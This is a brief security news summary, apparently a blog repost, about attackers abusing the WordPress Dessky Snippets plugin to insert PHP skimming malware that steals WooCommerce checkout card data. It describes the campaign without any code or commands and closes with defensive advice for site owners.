WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites

WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites

May 28, 2024 at 02:45AM

Unknown threat actors are exploiting WordPress’s Dessky Snippets plugin, with over 200 active installations, to insert PHP credit card skimming malware into compromised sites. The malware manipulates WooCommerce’s checkout process to steal credit card details, exfiltrating them to a specific URL. This underscores the need for WordPress site owners, especially e-commerce operators, to prioritize security measures like password strength, regular audits, and plugin updates.

Key takeaways from the meeting notes:

– Threat actors are exploiting lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites, compromising credit card data.
– The campaign involves the abuse of the WordPress plugin “Dessky Snippets” to insert a server-side PHP credit card skimming malware on compromised sites.
– The malware is designed to modify the checkout process in WooCommerce by injecting its own code and exfiltrating credit card details to a specified URL.
– The billing form associated with the malware has its autocomplete attribute disabled to reduce suspicion and increase the likelihood of users entering sensitive information without warning.
– Previous instances have revealed the abuse of legitimate code snippet plugins for malicious purposes, highlighting the need for site owners, especially e-commerce sites, to keep their plugins up-to-date, use strong passwords, and regularly audit for signs of malware or unauthorized changes.

Full Article